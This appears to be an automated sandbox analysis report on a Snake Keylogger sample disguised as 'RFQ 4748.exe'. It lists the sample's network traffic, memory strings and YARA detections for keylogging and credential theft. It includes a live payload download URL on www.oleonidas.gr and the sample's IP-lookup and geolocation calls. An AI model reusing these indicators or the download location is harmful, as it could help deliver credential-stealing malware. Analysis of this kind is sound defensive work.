                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49706 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49765 version: TLS 1.0
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /slim/Knlpdavcfrw.vdf HTTP/1.1Host: www.oleonidas.grConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /slim/Knlpdavcfrw.vdf HTTP/1.1Host: www.oleonidas.grConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: www.oleonidas.gr
                  Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                  Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                  Source: InstallUtil.exe, 00000002.00000002.4496477218.0000000002CFD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496477218.0000000002D64000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496477218.0000000002D55000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496477218.0000000002D0B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496477218.0000000002C69000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496477218.0000000002D27000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496477218.0000000002D19000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4496144498.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4496144498.0000000002A93000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4496144498.0000000002ACF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4496144498.00000000029D5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4496144498.0000000002A85000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4496144498.0000000002A69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                  Source: InstallUtil.exe, 00000002.00000002.4496477218.0000000002CFD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496477218.0000000002D35000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496477218.0000000002D64000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496477218.0000000002D55000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496477218.0000000002CAD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496477218.0000000002D0B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496477218.0000000002C69000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496477218.0000000002D27000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496477218.0000000002BB1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496477218.0000000002D19000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4496144498.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4496144498.00000000029C2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4496144498.0000000002A93000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4496144498.0000000002ACF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4496144498.0000000002AA1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4496144498.0000000002A18000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4496144498.00000000029D5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4496144498.0000000002A85000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4496144498.0000000002A69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                  Source: InstallUtil.exe, 00000002.00000002.4496477218.0000000002BB1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4496144498.0000000002911000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                  Source: RFQ 4748.exe, 00000000.00000002.2097379487.0000000003EB1000.00000004.00000800.00020000.00000000.sdmp, RFQ 4748.exe, 00000000.00000002.2097379487.0000000003F95000.00000004.00000800.00020000.00000000.sdmp, RFQ 4748.exe, 00000000.00000002.2089151863.0000000003299000.00000004.00000800.00020000.00000000.sdmp, Fallback.exe, 00000005.00000002.2288151559.0000000003719000.00000004.00000800.00020000.00000000.sdmp, Fallback.exe, 00000005.00000002.2303227720.000000000438F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4492594683.000000000041B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                  Source: InstallUtil.exe, 00000002.00000002.4496477218.0000000002C82000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496477218.0000000002CFD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496477218.0000000002D64000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496477218.0000000002D55000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496477218.0000000002D0B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496477218.0000000002D27000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496477218.0000000002D19000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4496144498.00000000029ED000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4496144498.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4496144498.0000000002A93000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4496144498.0000000002ACF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4496144498.0000000002A85000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4496144498.0000000002A69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
                  Source: RFQ 4748.exe, 00000000.00000002.2089151863.0000000002E31000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496477218.0000000002BB1000.00000004.00000800.00020000.00000000.sdmp, Fallback.exe, 00000005.00000002.2288151559.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4496144498.0000000002911000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: RFQ 4748.exe, 00000000.00000002.2105520492.0000000006BC0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                  Source: RFQ 4748.exe, 00000000.00000002.2105520492.0000000006BC0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                  Source: RFQ 4748.exe, 00000000.00000002.2105520492.0000000006BC0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                  Source: InstallUtil.exe, 00000002.00000002.4496477218.0000000002CFD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496477218.0000000002D64000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496477218.0000000002D55000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496477218.0000000002CAD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496477218.0000000002D0B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496477218.0000000002C69000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496477218.0000000002D27000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496477218.0000000002D19000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4496144498.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4496144498.0000000002A93000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4496144498.0000000002ACF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4496144498.0000000002A18000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4496144498.00000000029D5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4496144498.0000000002A85000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4496144498.0000000002A69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                  Source: RFQ 4748.exe, 00000000.00000002.2097379487.0000000003EB1000.00000004.00000800.00020000.00000000.sdmp, RFQ 4748.exe, 00000000.00000002.2097379487.0000000003F95000.00000004.00000800.00020000.00000000.sdmp, RFQ 4748.exe, 00000000.00000002.2089151863.0000000003299000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496477218.0000000002C69000.00000004.00000800.00020000.00000000.sdmp, Fallback.exe, 00000005.00000002.2288151559.0000000003719000.00000004.00000800.00020000.00000000.sdmp, Fallback.exe, 00000005.00000002.2303227720.000000000438F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4492594683.000000000041B000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4496144498.00000000029D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                  Source: InstallUtil.exe, 00000006.00000002.4496144498.0000000002A69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.90
                  Source: InstallUtil.exe, 00000002.00000002.4496477218.0000000002CFD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496477218.0000000002D64000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496477218.0000000002D55000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496477218.0000000002CAD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496477218.0000000002D0B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496477218.0000000002D27000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496477218.0000000002D19000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4496144498.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4496144498.0000000002A93000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4496144498.0000000002ACF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4496144498.0000000002A18000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4496144498.0000000002A85000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4496144498.0000000002A69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.90$
                  Source: RFQ 4748.exe, 00000000.00000002.2105520492.0000000006BC0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                  Source: RFQ 4748.exe, 00000000.00000002.2105520492.0000000006BC0000.00000004.08000000.00040000.00000000.sdmp, RFQ 4748.exe, 00000000.00000002.2089151863.0000000002EDC000.00000004.00000800.00020000.00000000.sdmp, Fallback.exe, 00000005.00000002.2288151559.000000000336C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                  Source: RFQ 4748.exe, 00000000.00000002.2105520492.0000000006BC0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                  Source: RFQ 4748.exe, 00000000.00000002.2089151863.0000000002E31000.00000004.00000800.00020000.00000000.sdmp, Fallback.exe, 00000005.00000002.2288151559.00000000032C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.oleonidas.gr
                  Source: RFQ 4748.exe, 00000000.00000002.2089151863.0000000002E31000.00000004.00000800.00020000.00000000.sdmp, Fallback.exe, 00000005.00000002.2288151559.00000000032C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.oleonidas.gr/slim/Knlpdavcfrw.vdf
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                  Source: unknownHTTPS traffic detected: 185.78.221.73:443 -> 192.168.2.5:49704 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 185.78.221.73:443 -> 192.168.2.5:49722 version: TLS 1.2

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 5.2.Fallback.exe.438fdb0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 5.2.Fallback.exe.438fdb0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 5.2.Fallback.exe.438fdb0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 5.2.Fallback.exe.438fdb0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 0.2.RFQ 4748.exe.3f179d0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.RFQ 4748.exe.3f179d0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.RFQ 4748.exe.3f179d0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.RFQ 4748.exe.3f179d0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 6.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 6.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 0.2.RFQ 4748.exe.3effdb0.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.RFQ 4748.exe.3effdb0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.RFQ 4748.exe.3effdb0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.RFQ 4748.exe.3effdb0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 0.2.RFQ 4748.exe.3f179d0.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.RFQ 4748.exe.3f179d0.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 5.2.Fallback.exe.438fdb0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.RFQ 4748.exe.3f179d0.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 5.2.Fallback.exe.438fdb0.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.RFQ 4748.exe.3f179d0.2.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 5.2.Fallback.exe.438fdb0.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 5.2.Fallback.exe.438fdb0.1.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 0.2.RFQ 4748.exe.3eb1590.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.RFQ 4748.exe.3eb1590.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.RFQ 4748.exe.3eb1590.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.RFQ 4748.exe.3eb1590.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 00000006.00000002.4492594683.000000000041B000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 00000000.00000002.2097379487.0000000003EB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000000.00000002.2097379487.0000000003EB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 00000005.00000002.2288151559.0000000003719000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 00000005.00000002.2303227720.000000000438F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000005.00000002.2303227720.000000000438F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
